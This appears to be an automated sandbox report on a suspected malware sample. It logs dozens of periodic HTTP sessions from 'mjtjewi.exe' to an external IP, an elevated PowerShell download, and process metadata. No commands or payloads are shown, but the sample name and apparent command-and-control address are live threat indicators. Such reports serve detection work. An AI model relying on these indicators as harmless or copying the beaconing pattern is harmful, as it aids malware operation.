Oct 3, 2024 09:21:49.089157104 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
47 | 192.168.2.11 | 64392 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:49.253714085 CEST | 262 | OUT | |
Oct 3, 2024 09:21:49.258711100 CEST | 149 | OUT | |
Oct 3, 2024 09:21:50.342468977 CEST | 177 | IN | |
Oct 3, 2024 09:21:50.342633009 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
48 | 192.168.2.11 | 64393 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:50.494801044 CEST | 262 | OUT | |
Oct 3, 2024 09:21:50.499694109 CEST | 149 | OUT | |
Oct 3, 2024 09:21:51.137919903 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
49 | 192.168.2.11 | 64394 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:51.282442093 CEST | 262 | OUT | |
Oct 3, 2024 09:21:51.287565947 CEST | 149 | OUT | |
Oct 3, 2024 09:21:51.987176895 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
50 | 192.168.2.11 | 64395 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:52.143836975 CEST | 262 | OUT | |
Oct 3, 2024 09:21:52.148747921 CEST | 149 | OUT | |
Oct 3, 2024 09:21:52.824364901 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
51 | 192.168.2.11 | 64396 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:52.975395918 CEST | 262 | OUT | |
Oct 3, 2024 09:21:52.981934071 CEST | 149 | OUT | |
Oct 3, 2024 09:21:53.812876940 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
52 | 192.168.2.11 | 64397 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:53.998188972 CEST | 262 | OUT | |
Oct 3, 2024 09:21:54.007169008 CEST | 149 | OUT | |
Oct 3, 2024 09:21:54.779628992 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
53 | 192.168.2.11 | 64398 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:54.934883118 CEST | 262 | OUT | |
Oct 3, 2024 09:21:54.945255995 CEST | 149 | OUT | |
Oct 3, 2024 09:21:55.743837118 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
54 | 192.168.2.11 | 64399 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:55.903311968 CEST | 262 | OUT | |
Oct 3, 2024 09:21:55.920208931 CEST | 149 | OUT | |
Oct 3, 2024 09:21:57.049427986 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
55 | 192.168.2.11 | 64400 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:57.211874008 CEST | 262 | OUT | |
Oct 3, 2024 09:21:57.220849991 CEST | 149 | OUT | |
Oct 3, 2024 09:21:58.009134054 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
56 | 192.168.2.11 | 64401 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:58.166697025 CEST | 262 | OUT | |
Oct 3, 2024 09:21:58.171911955 CEST | 149 | OUT | |
Oct 3, 2024 09:21:58.968790054 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
57 | 192.168.2.11 | 64402 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:59.146181107 CEST | 262 | OUT | |
Oct 3, 2024 09:21:59.151254892 CEST | 149 | OUT | |
Oct 3, 2024 09:21:59.912592888 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
58 | 192.168.2.11 | 64403 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:00.068260908 CEST | 262 | OUT | |
Oct 3, 2024 09:22:00.075267076 CEST | 149 | OUT | |
Oct 3, 2024 09:22:00.875777006 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
59 | 192.168.2.11 | 64404 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:01.038656950 CEST | 262 | OUT | |
Oct 3, 2024 09:22:01.051486015 CEST | 149 | OUT | |
Oct 3, 2024 09:22:02.986509085 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
60 | 192.168.2.11 | 64405 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:03.152149916 CEST | 262 | OUT | |
Oct 3, 2024 09:22:03.157629013 CEST | 149 | OUT | |
Oct 3, 2024 09:22:03.927012920 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
61 | 192.168.2.11 | 64406 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:04.103874922 CEST | 262 | OUT | |
Oct 3, 2024 09:22:04.115545034 CEST | 149 | OUT | |
Oct 3, 2024 09:22:04.921690941 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
62 | 192.168.2.11 | 64407 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:05.334078074 CEST | 262 | OUT | |
Oct 3, 2024 09:22:05.338912010 CEST | 149 | OUT | |
Oct 3, 2024 09:22:06.114370108 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
63 | 192.168.2.11 | 64408 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:06.277036905 CEST | 262 | OUT | |
Oct 3, 2024 09:22:06.283715963 CEST | 149 | OUT | |
Oct 3, 2024 09:22:07.060122967 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
64 | 192.168.2.11 | 64409 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:07.216347933 CEST | 262 | OUT | |
Oct 3, 2024 09:22:07.225457907 CEST | 149 | OUT | |
Oct 3, 2024 09:22:07.996001959 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
65 | 192.168.2.11 | 64410 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:08.302642107 CEST | 262 | OUT | |
Oct 3, 2024 09:22:08.313595057 CEST | 149 | OUT | |
Oct 3, 2024 09:22:09.068078041 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
66 | 192.168.2.11 | 64411 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:09.225388050 CEST | 262 | OUT | |
Oct 3, 2024 09:22:09.230402946 CEST | 149 | OUT | |
Oct 3, 2024 09:22:10.003968000 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
67 | 192.168.2.11 | 64412 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:10.326421022 CEST | 262 | OUT | |
Oct 3, 2024 09:22:10.331435919 CEST | 149 | OUT | |
Oct 3, 2024 09:22:11.079188108 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
68 | 192.168.2.11 | 64413 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:11.234513044 CEST | 262 | OUT | |
Oct 3, 2024 09:22:11.239805937 CEST | 149 | OUT | |
Oct 3, 2024 09:22:12.003453970 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
69 | 192.168.2.11 | 64414 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:12.165453911 CEST | 262 | OUT | |
Oct 3, 2024 09:22:12.172122955 CEST | 149 | OUT | |
Oct 3, 2024 09:22:12.893414021 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
70 | 192.168.2.11 | 64415 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:13.061347961 CEST | 262 | OUT | |
Oct 3, 2024 09:22:13.068984985 CEST | 149 | OUT | |
Oct 3, 2024 09:22:13.853063107 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
71 | 192.168.2.11 | 64416 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:14.003642082 CEST | 262 | OUT | |
Oct 3, 2024 09:22:14.008975029 CEST | 149 | OUT | |
Oct 3, 2024 09:22:14.776112080 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
72 | 192.168.2.11 | 64417 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:14.930037022 CEST | 262 | OUT | |
Oct 3, 2024 09:22:14.936067104 CEST | 149 | OUT | |
Oct 3, 2024 09:22:15.763972998 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
73 | 192.168.2.11 | 64418 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:15.921727896 CEST | 262 | OUT | |
Oct 3, 2024 09:22:15.929178953 CEST | 149 | OUT | |
Oct 3, 2024 09:22:16.667747974 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
74 | 192.168.2.11 | 64419 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:16.822302103 CEST | 262 | OUT | |
Oct 3, 2024 09:22:16.827330112 CEST | 149 | OUT | |
Oct 3, 2024 09:22:17.525538921 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
75 | 192.168.2.11 | 64420 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:17.698632956 CEST | 262 | OUT | |
Oct 3, 2024 09:22:17.703674078 CEST | 149 | OUT | |
Oct 3, 2024 09:22:18.554850101 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
76 | 192.168.2.11 | 64421 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:18.709377050 CEST | 262 | OUT | |
Oct 3, 2024 09:22:18.714301109 CEST | 149 | OUT | |
Oct 3, 2024 09:22:19.379185915 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
77 | 192.168.2.11 | 64422 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:19.542762041 CEST | 262 | OUT | |
Oct 3, 2024 09:22:19.547744036 CEST | 149 | OUT | |
Oct 3, 2024 09:22:20.358504057 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
78 | 192.168.2.11 | 64423 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:20.561255932 CEST | 262 | OUT | |
Oct 3, 2024 09:22:20.566221952 CEST | 149 | OUT | |
Oct 3, 2024 09:22:21.203330994 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
79 | 192.168.2.11 | 64424 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:21.351571083 CEST | 262 | OUT | |
Oct 3, 2024 09:22:21.356698990 CEST | 149 | OUT | |
Oct 3, 2024 09:22:22.048629045 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
80 | 192.168.2.11 | 64425 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:22.215054035 CEST | 262 | OUT | |
Oct 3, 2024 09:22:22.220180988 CEST | 149 | OUT | |
Oct 3, 2024 09:22:22.910722017 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
81 | 192.168.2.11 | 64426 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:23.364090919 CEST | 262 | OUT | |
Oct 3, 2024 09:22:23.369318008 CEST | 149 | OUT | |
Oct 3, 2024 09:22:23.931077957 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
82 | 192.168.2.11 | 64427 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:24.101181030 CEST | 262 | OUT | |
Oct 3, 2024 09:22:24.106030941 CEST | 149 | OUT | |
Oct 3, 2024 09:22:24.748373032 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
83 | 192.168.2.11 | 64428 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:24.905708075 CEST | 262 | OUT | |
Oct 3, 2024 09:22:24.910666943 CEST | 149 | OUT | |
Oct 3, 2024 09:22:25.638870001 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
84 | 192.168.2.11 | 64429 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:25.810230017 CEST | 262 | OUT | |
Oct 3, 2024 09:22:25.816015959 CEST | 149 | OUT | |
Oct 3, 2024 09:22:26.473027945 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
85 | 192.168.2.11 | 64430 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:26.654994965 CEST | 262 | OUT | |
Oct 3, 2024 09:22:26.659849882 CEST | 149 | OUT | |
Oct 3, 2024 09:22:27.331634998 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
86 | 192.168.2.11 | 64431 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:27.499201059 CEST | 262 | OUT | |
Oct 3, 2024 09:22:27.504132032 CEST | 149 | OUT | |
Oct 3, 2024 09:22:28.156263113 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
87 | 192.168.2.11 | 64432 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:28.306813955 CEST | 262 | OUT | |
Oct 3, 2024 09:22:28.311778069 CEST | 149 | OUT | |
Oct 3, 2024 09:22:29.195664883 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
88 | 192.168.2.11 | 64433 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:29.634440899 CEST | 262 | OUT | |
Oct 3, 2024 09:22:29.639445066 CEST | 149 | OUT | |
Oct 3, 2024 09:22:30.480031967 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
89 | 192.168.2.11 | 64434 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:30.641104937 CEST | 262 | OUT | |
Oct 3, 2024 09:22:30.646051884 CEST | 149 | OUT | |
Oct 3, 2024 09:22:31.486274004 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
90 | 192.168.2.11 | 64435 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:31.669754982 CEST | 262 | OUT | |
Oct 3, 2024 09:22:31.674681902 CEST | 149 | OUT | |
Oct 3, 2024 09:22:32.303347111 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
91 | 192.168.2.11 | 64436 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:32.497924089 CEST | 262 | OUT | |
Oct 3, 2024 09:22:32.502916098 CEST | 149 | OUT | |
Oct 3, 2024 09:22:33.187992096 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
92 | 192.168.2.11 | 64437 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:33.334327936 CEST | 262 | OUT | |
Oct 3, 2024 09:22:33.340490103 CEST | 149 | OUT | |
Oct 3, 2024 09:22:34.292666912 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
93 | 192.168.2.11 | 64438 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:34.443031073 CEST | 262 | OUT | |
Oct 3, 2024 09:22:34.448158026 CEST | 149 | OUT | |
Oct 3, 2024 09:22:35.079196930 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
94 | 192.168.2.11 | 64439 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:35.220199108 CEST | 262 | OUT | |
Oct 3, 2024 09:22:35.225001097 CEST | 149 | OUT | |
Oct 3, 2024 09:22:35.848511934 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
95 | 192.168.2.11 | 64440 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:36.009468079 CEST | 262 | OUT | |
Oct 3, 2024 09:22:36.015475988 CEST | 149 | OUT | |
Oct 3, 2024 09:22:36.750042915 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
96 | 192.168.2.11 | 64441 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:36.912101984 CEST | 262 | OUT | |
Oct 3, 2024 09:22:36.917140007 CEST | 149 | OUT | |
Oct 3, 2024 09:22:37.777426004 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
97 | 192.168.2.11 | 64442 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:37.926255941 CEST | 262 | OUT | |
Oct 3, 2024 09:22:37.931400061 CEST | 149 | OUT | |
Oct 3, 2024 09:22:38.687633038 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
98 | 192.168.2.11 | 64443 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:38.831857920 CEST | 262 | OUT | |
Oct 3, 2024 09:22:38.836711884 CEST | 149 | OUT | |
Oct 3, 2024 09:22:39.523708105 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
99 | 192.168.2.11 | 64444 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:39.676918030 CEST | 262 | OUT | |
Oct 3, 2024 09:22:39.681925058 CEST | 149 | OUT | |
Oct 3, 2024 09:22:40.350311041 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
100 | 192.168.2.11 | 64445 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:40.609555960 CEST | 262 | OUT | |
Oct 3, 2024 09:22:40.614660025 CEST | 149 | OUT | |
Oct 3, 2024 09:22:41.352128983 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
101 | 192.168.2.11 | 64446 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:41.552056074 CEST | 262 | OUT | |
Oct 3, 2024 09:22:41.558182955 CEST | 149 | OUT | |
Oct 3, 2024 09:22:42.187657118 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
102 | 192.168.2.11 | 64447 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:42.339214087 CEST | 262 | OUT | |
Oct 3, 2024 09:22:42.344415903 CEST | 149 | OUT | |
Oct 3, 2024 09:22:43.088213921 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
103 | 192.168.2.11 | 64448 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:43.246021032 CEST | 262 | OUT | |
Oct 3, 2024 09:22:43.251789093 CEST | 149 | OUT | |
Oct 3, 2024 09:22:43.910703897 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
104 | 192.168.2.11 | 64449 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:22:44.062635899 CEST | 262 | OUT | |
Oct 3, 2024 09:22:44.067473888 CEST | 149 | OUT | |
Oct 3, 2024 09:22:44.839922905 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.11 | 49710 | 188.114.96.3 | 443 | 4552 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-03 07:20:41 UTC | 196 | OUT | |
2024-10-03 07:20:41 UTC | 658 | IN | |
2024-10-03 07:20:43 UTC | 1369 | IN | |
2024-10-03 07:20:43 UTC | 1369 | IN | |
2024-10-03 07:20:43 UTC | 1369 | IN | |
2024-10-03 07:20:43 UTC | 1369 | IN | |
2024-10-03 07:20:43 UTC | 58 | IN | |
2024-10-03 07:20:43 UTC | 1369 | IN | |
2024-10-03 07:20:43 UTC | 1369 | IN | |
2024-10-03 07:20:43 UTC | 1369 | IN | |
2024-10-03 07:20:43 UTC | 237 | IN | |
2024-10-03 07:20:43 UTC | 1369 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 03:20:36 |
Start date: | 03/10/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6eb350000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 03:20:36 |
Start date: | 03/10/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff68cce0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
